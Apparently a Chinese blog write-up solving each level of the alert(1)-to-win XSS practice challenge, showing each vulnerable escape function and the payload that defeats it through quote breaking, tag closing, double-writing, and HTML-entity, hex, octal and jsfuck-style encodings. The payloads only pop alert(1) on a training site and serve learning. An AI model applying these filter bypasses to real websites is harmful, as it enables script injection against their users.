<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="null"><meta name="description" content="平台地址：https://alf.nu/alert1"><meta name="author" content="Katharsis"><title>alert(1)-to-win的payload与知识点总结 - Kath4rs1s</title><meta description="平台地址：https:&amp;#x2F;&amp;#x2F;alf.nu&amp;#x2F;alert1"><meta property="og:type" content="article"><meta property="og:title" content="alert(1)-to-win的payload与知识点总结"><meta property="og:url" content="http://yoursite.com/2020/10/03/alert-1-to-win/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="平台地址：https:&amp;#x2F;&amp;#x2F;alf.nu&amp;#x2F;alert1"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-10-03T08:13:06.000Z"><meta property="article:modified_time" content="2020-10-08T07:32:28.569Z"><meta property="article:author" content="Katharsis"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/10/03/alert-1-to-win/"},"headline":"alert(1)-to-win的payload与知识点总结","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-10-03T08:13:06.000Z","dateModified":"2020-10-08T07:32:28.569Z","author":{"@type":"Person","name":"Katharsis"},"description":"平台地址：https:&#x2F;&#x2F;alf.nu&#x2F;alert1"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-10-03  <span class="level-item"><i class="far fa-clock"> </i>8 m  <i class="fas fa-pencil-alt"> </i>1.1 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">alert(1)-to-win的payload与知识点总结</h1><div class="content"><p>平台地址：<a href="https://alf.nu/alert1">https://alf.nu/alert1</a></p>
<a id="more"></a>
<p>[toc]</p>
<h2 id="Warmup-无过滤"><a href="#Warmup-无过滤" class="headerlink" title="Warmup 无过滤"></a>Warmup 无过滤</h2><p>查看代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  return &#39;&lt;script&gt;console.log(&quot;&#39;+s+&#39;&quot;);&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>没有任何过滤，拼接构造出paylaod：<code>1111&quot;);alert(1|&quot;</code>,<br>拼接之后是这样的：<code>&lt;script&gt;console.log(&quot;1111&quot;);alert(1|&quot;&quot;);&lt;/script&gt;</code></p>
<p>或者可以这样构造：<code>1111&quot;);alert(1);//</code><br>用双斜杠把后面的注释掉。</p>
<h2 id="Adobe-转义双引号"><a href="#Adobe-转义双引号" class="headerlink" title="Adobe 转义双引号"></a>Adobe 转义双引号</h2><p>查看代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s &#x3D; s.replace(&#x2F;&quot;&#x2F;g, &#39;\\&quot;&#39;);</span><br><span class="line">  return &#39;&lt;script&gt;console.log(&quot;&#39; + s + &#39;&quot;);&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>会把双引号转换为反斜杠加引号使引号转义导致引号不可用，但是他没有过滤反斜杠，可以使用反斜杠转义掉他添加的反斜杠。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1\&quot;);alert(1);&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="JSON-JSON-stringify"><a href="#JSON-JSON-stringify" class="headerlink" title="JSON JSON.stringify()"></a>JSON JSON.stringify()</h2><p>查看代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s &#x3D; JSON.stringify(s);</span><br><span class="line">  return &#39;&lt;script&gt;console.log(&#39; + s + &#39;);&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>JSON.stringify()</strong>函数会转义双引号 <code>&quot;</code> 与反斜杠 <code>\</code> ，没有对 <code>&lt; &gt; / &#39;</code> 等字符进行转义。那么闭合script标签，创建一个新的script 标签来执行alert(1)，用 <code>//</code> 注释掉多余的字符串。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;script&gt;&lt;script&gt;alert(1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="Markdown"><a href="#Markdown" class="headerlink" title="Markdown"></a>Markdown</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  var text &#x3D; s.replace(&#x2F;&lt;&#x2F;g, &#39;&lt;&#39;).replace(&#x2F;&quot;&#x2F;g, &#39;&quot;&#39;);</span><br><span class="line">  &#x2F;&#x2F; URLs</span><br><span class="line">  text &#x3D; text.replace(&#x2F;(http:\&#x2F;\&#x2F;\S+)&#x2F;g, &#39;&lt;a href&#x3D;&quot;$1&quot;&gt;$1&lt;&#x2F;a&gt;&#39;);</span><br><span class="line">  &#x2F;&#x2F; [[img123|Description]]</span><br><span class="line">  text &#x3D; text.replace(&#x2F;\[\[(\w+)\|(.+?)\]\]&#x2F;g, &#39;&lt;img alt&#x3D;&quot;$2&quot; src&#x3D;&quot;$1.gif&quot;&gt;&#39;);</span><br><span class="line">  return text;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先转义尖括号 <code>&lt;</code> ，第二行是将形如 <code>http://S+</code> 的字符串改写为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href&#x3D;&quot;http:&#x2F;&#x2F;S+&quot;&gt;http:&#x2F;&#x2F;S+&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>
<p>（S+为匹配一个非空白字符一次或多次） 第三行将形如 <code>[[a|b]]</code> 的字符串改写为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img alt&#x3D;&quot;b&quot; src&#x3D;&quot;a.gif&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>先放出payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[[a|http:&#x2F;&#x2F;onerror&#x3D;alert(1)&#x2F;&#x2F;]]</span><br></pre></td></tr></table></figure>
<p>该payload的构造结果为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img alt&#x3D;&quot;&lt;a href&#x3D;&quot;http:&#x2F;&#x2F;onerror1&#x3D;alert(1)&#x2F;&#x2F;&quot; src&#x3D;&quot;a.gif&quot;&gt;&quot;&gt;http:&#x2F;&#x2F;onerror&#x3D;alert(1)&#x2F;&#x2F;]]&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>
<p>首先href的第一个 <code>&quot;</code> 闭合掉alt的 <code>&quot;</code> ，然后利用 <code>//</code> 代替空格，再用 <code>//</code> 注释掉最后的 <code>&quot;</code> 。</p>
<h2 id="DOM-构造createComment"><a href="#DOM-构造createComment" class="headerlink" title="DOM 构造createComment()"></a>DOM 构造createComment()</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  &#x2F;&#x2F; Slightly too lazy to make two input fields.</span><br><span class="line">  &#x2F;&#x2F; Pass in something like &quot;TextNode#foo&quot;</span><br><span class="line">  var m &#x3D; s.split(&#x2F;#&#x2F;);</span><br><span class="line"></span><br><span class="line">  &#x2F;&#x2F; Only slightly contrived at this point.</span><br><span class="line">  var a &#x3D; document.createElement(&#39;div&#39;);</span><br><span class="line">  a.appendChild(document[&#39;create&#39;+m[0]].apply(document, m.slice(1)));</span><br><span class="line">  return a.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这段代码要求输入一个形如 <code>a#b</code> 的字符串，然后#分割，前面的部分与create拼接形成一个createxxx的函数，<code>document[&#39;create&#39; + m[0]]</code> 相当于调用了 <code>document.createXXX()</code>函数,<br>一开始我想使用 <code>document.createTextNode()</code> ，但是发现这个函数也会对双引号和反斜杠转义，只能用 <code>document.createComment()</code> ，这个函数会创建一个注释节点。<br>测试一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Comment#111111</span><br></pre></td></tr></table></figure>
<p>output:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--11111--&gt;</span><br></pre></td></tr></table></figure>
<p>那么只要闭合掉注释标签然后构造代码就好了<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Comment#--&gt;&lt;img&#x2F;onerror&#x3D;alert(1) src&#x3D;x&#x2F;&gt;</span><br><span class="line">Comment#&gt;&lt;iframe&#x2F;onload&#x3D;alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="Callback"><a href="#Callback" class="headerlink" title="Callback"></a>Callback</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  &#x2F;&#x2F; Pass inn &quot;callback#userdata&quot;</span><br><span class="line">  var thing &#x3D; s.split(&#x2F;#&#x2F;); </span><br><span class="line"></span><br><span class="line">  if (!&#x2F;^[a-zA-Z\[\]&#39;]*$&#x2F;.test(thing[0])) return &#39;Invalid callback&#39;;</span><br><span class="line">  var obj &#x3D; &#123;&#39;userdata&#39;: thing[1] &#125;;</span><br><span class="line">  var json &#x3D; JSON.stringify(obj).replace(&#x2F;&lt;&#x2F;g, &#39;\\u003c&#39;);</span><br><span class="line">  return &quot;&lt;script&gt;&quot; + thing[0] + &quot;(&quot; + json +&quot;)&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>第一个字段为 <code>thing[0]</code> 不允许有 <code>a-z A-Z [ ] &#39;</code> 中其他字符出现，第二个字段json对字符 <code>\ &quot; &lt;</code> 进行了转义。按照程序的结果，本意应该是构造下面这种形式Input</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aaa#bbb</span><br></pre></td></tr></table></figure>
<p>output:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;aaa(&#123;&quot;userdata&quot;:&quot;bbb&quot;&#125;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p>但是 <code>thing[0]</code> 可以包含 <code>[ ] &#39;</code> 字符，却没有进行转义，那就简单了<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;#&#39;|alert(1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<p>output:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;&#39;(&#123;&quot;userdata&quot;:&quot;&#39;|alert(1)&#x2F;&#x2F;&quot;&#125;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Skandia-html编码绕过大写转换"><a href="#Skandia-html编码绕过大写转换" class="headerlink" title="Skandia html编码绕过大写转换"></a>Skandia html编码绕过大写转换</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  return &#39;&lt;script&gt;console.log(&quot;&#39; + s.toUpperCase() + &#39;&quot;)&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>toUpperCase()</strong> 函数将小写字符转换为大写字符，alert()函数会变成ALERT()，无法执行。 可以采用HTML实体编码来绕过<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;script&gt;&lt;iframe&#x2F;onload&#x3D;&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;</span><br><span class="line">&lt;&#x2F;script&gt;&lt;img src&#x3D;x onerror&#x3D;&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt; &#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<p>output:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(&quot;&lt;&#x2F;SCRIPT&gt;&lt;IMG SRC&#x3D;X ONERROR&#x3D;&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt; &#x2F;&#x2F;&quot;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Template-十六进制编码"><a href="#Template-十六进制编码" class="headerlink" title="Template 十六进制编码"></a>Template 十六进制编码</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  function htmlEscape(s) &#123;</span><br><span class="line">    return s.replace(&#x2F;.&#x2F;g, function(x) &#123;</span><br><span class="line">       return &#123; &#39;&lt;&#39;: &#39;&lt;&#39;, &#39;&gt;&#39;: &#39;&gt;&#39;, &#39;&amp;&#39;: &#39;&amp;&#39;, &#39;&quot;&#39;: &#39;&quot;&#39;, &quot;&#39;&quot;: &#39;&#39;&#39; &#125;[x] || x;       </span><br><span class="line">     &#125;);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function expandTemplate(template, args) &#123;</span><br><span class="line">    return template.replace(</span><br><span class="line">        &#x2F;&#123;(\w+)&#125;&#x2F;g, </span><br><span class="line">        function(_, n) &#123; </span><br><span class="line">           return htmlEscape(args[n]);</span><br><span class="line">         &#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  return expandTemplate(</span><br><span class="line">    &quot;                                                \n\</span><br><span class="line">      &lt;h2&gt;Hello, &lt;span id&#x3D;name&gt;&lt;&#x2F;span&gt;!&lt;&#x2F;h2&gt;         \n\</span><br><span class="line">      &lt;script&gt;                                       \n\</span><br><span class="line">         var v &#x3D; document.getElementById(&#39;name&#39;);    \n\</span><br><span class="line">         v.innerHTML &#x3D; &#39;&lt;a href&#x3D;#&gt;&#123;name&#125;&lt;&#x2F;a&gt;&#39;;       \n\</span><br><span class="line">      &lt;\&#x2F;script&gt;                                     \n\</span><br><span class="line">    &quot;,</span><br><span class="line">    &#123; name : s &#125;</span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这段代码会对 <code>&lt; &gt; &#39; &quot; &amp;</code> 字符进行转义，但是没有过滤 <code>\</code> 于是可以使用十六进制编码进行bypass。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1\x3c&#x2F;a\x3e\x3cimg&#x2F;src&#x3D;x onerror&#x3D;alert(1)\x3e</span><br></pre></td></tr></table></figure>
<p>output:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;h2&gt;Hello, &lt;span id&#x3D;name&gt;&lt;&#x2F;span&gt;!&lt;&#x2F;h2&gt;         </span><br><span class="line">&lt;script&gt;                                       </span><br><span class="line">   var v &#x3D; document.getElementById(&#39;name&#39;);    </span><br><span class="line">   v.innerHTML &#x3D; &#39;&lt;a href&#x3D;#&gt;1\x3c&#x2F;a\x3e\x3cimg&#x2F;src&#x3D;x onerror&#x3D;alert(1)\x3e&lt;&#x2F;a&gt;&#39;;       </span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="SON-2-双写绕过"><a href="#SON-2-双写绕过" class="headerlink" title="SON 2 双写绕过"></a>SON 2 双写绕过</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  s &#x3D; JSON.stringify(s).replace(&#x2F;&lt;\&#x2F;script&#x2F;gi, &#39;&#39;);</span><br><span class="line"></span><br><span class="line">  return &#39;&lt;script&gt;console.log(&#39; + s + &#39;);&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这段代码会把 <code>&lt;/script</code> 替换为空串，（g: 全局查找，i：忽略大小写），使用双写绕过<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;scr&lt;&#x2F;scriptipt&gt;&lt;img&#x2F;src&#x3D;x onerror&#x3D;alert(1)&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Callback-2-三种注释符"><a href="#Callback-2-三种注释符" class="headerlink" title="Callback 2 三种注释符"></a>Callback 2 三种注释符</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  &#x2F;&#x2F; Pass inn &quot;callback#userdata&quot;</span><br><span class="line">  var thing &#x3D; s.split(&#x2F;#&#x2F;); </span><br><span class="line"></span><br><span class="line">  if (!&#x2F;^[a-zA-Z\[\]&#39;]*$&#x2F;.test(thing[0])) return &#39;Invalid callback&#39;;</span><br><span class="line">  var obj &#x3D; &#123;&#39;userdata&#39;: thing[1] &#125;;</span><br><span class="line">  var json &#x3D; JSON.stringify(obj).replace(&#x2F;\&#x2F;&#x2F;g, &#39;\\&#x2F;&#39;);</span><br><span class="line">  return &quot;&lt;script&gt;&quot; + thing[0] + &quot;(&quot; + json +&quot;)&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Callback的加强版本，转义了 <code>/</code> ，无法构造 <code>//</code> 注释了，如果了解 javascript的注释是有三种的，分别为 <code>// /**/ &lt;!--</code> ，那么利用第三种就可以轻松绕过了<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;#&#39;|alert(1);&lt;!--</span><br></pre></td></tr></table></figure>

<h2 id="Skandia-2-jsfuck编码"><a href="#Skandia-2-jsfuck编码" class="headerlink" title="Skandia 2 jsfuck编码"></a>Skandia 2 jsfuck编码</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  if (&#x2F;[&lt;&gt;]&#x2F;.test(s)) return &#39;-&#39;;</span><br><span class="line"></span><br><span class="line">  return &#39;&lt;script&gt;console.log(&quot;&#39; + s.toUpperCase() + &#39;&quot;)&lt;&#x2F;script&gt;&#39;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>过滤了尖括号，而且变大写，只能使用编码绕过，aaencode和jsfuck都可以，但是写出的payload都超出了1000字符。如果图省事也可以使用<a href="http://www.atoolbox.net/Tool.php?Id=704">jjencode</a>编码，537个字符。<br>但是还是太长了，要寻找一种短一点的payload，参考jsfuck的工作原理：<a href="https://github.com/aemkei/jsfuck#basics">https://github.com/aemkei/jsfuck#basics</a><br>要执行代码就要构造出形如这样的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;fill&quot;][&quot;constructor&quot;](&quot;alert(1)&quot;)()</span><br></pre></td></tr></table></figure>
<p>这样可以执行alert(1)，<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);_&#x3D;!1+URL+!0,[][_[0]+_[10]+_[2]+_[2]][_[8]+_[11]+_[7]+_[3]+_[9]+_[38]+_[39]+_[8]+_[9]+_[11]+_[38]](_[1]+_[2]+_[4]+_[38]+_[9]+&#39;(1)&#39;)()&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<p>还可以使用八进制编码进行绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;|[][&#39;\160\157\160&#39;][&#39;\143\157\156\163\164\162\165\143\164\157\162&#39;](&#39;\141\154\145\162\164(1)&#39;)()|&quot;</span><br></pre></td></tr></table></figure>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/10/03/alert-1-to-win/">alert(1)-to-win的payload与知识点总结</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/10/03/alert-1-to-win/">http://yoursite.com/2020/10/03/alert-1-to-win/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/08/27/Writeup/" target="_blank">一篇writeup</a><br></span><span>  2.<a class="is-size-6" href="/2020/07/31/links/" target="_blank">一些笔记</a><br></span><span>  3.<a class="is-size-6" href="/2020/07/23/webshell/" target="_blank">无字母数字构造webshell的学习</a><br></span><span>  4.<a class="is-size-6" href="/2020/05/28/Kath4rs1s/" target="_blank">BUUCTF[NPUCTF2020]web WP</a><br></span><span>  5.<a class="is-size-6" href="/2020/05/28/hello-world/" target="_blank">Hello World</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/10/08/php-security/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">php安全小记（一）</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/29/xss-challenge-2/"><span class="level-item">xss从零开始之刷xss挑战</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-Warmup-无过滤" href="#Warmup-无过滤"><span>Warmup 无过滤</span></a></li><li><a class="is-flex toc-item" id="toc-item-Adobe-转义双引号" href="#Adobe-转义双引号"><span>Adobe 转义双引号</span></a></li><li><a class="is-flex toc-item" id="toc-item-JSON-JSON-stringify" href="#JSON-JSON-stringify"><span>JSON JSON.stringify()</span></a></li><li><a class="is-flex toc-item" id="toc-item-Markdown" href="#Markdown"><span>Markdown</span></a></li><li><a class="is-flex toc-item" id="toc-item-DOM-构造createComment" href="#DOM-构造createComment"><span>DOM 构造createComment()</span></a></li><li><a class="is-flex toc-item" id="toc-item-Callback" href="#Callback"><span>Callback</span></a></li><li><a class="is-flex toc-item" id="toc-item-Skandia-html编码绕过大写转换" href="#Skandia-html编码绕过大写转换"><span>Skandia html编码绕过大写转换</span></a></li><li><a class="is-flex toc-item" id="toc-item-Template-十六进制编码" href="#Template-十六进制编码"><span>Template 十六进制编码</span></a></li><li><a class="is-flex toc-item" id="toc-item-SON-2-双写绕过" href="#SON-2-双写绕过"><span>SON 2 双写绕过</span></a></li><li><a class="is-flex toc-item" id="toc-item-Callback-2-三种注释符" href="#Callback-2-三种注释符"><span>Callback 2 三种注释符</span></a></li><li><a class="is-flex toc-item" id="toc-item-Skandia-2-jsfuck编码" href="#Skandia-2-jsfuck编码"><span>Skandia 2 jsfuck编码</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
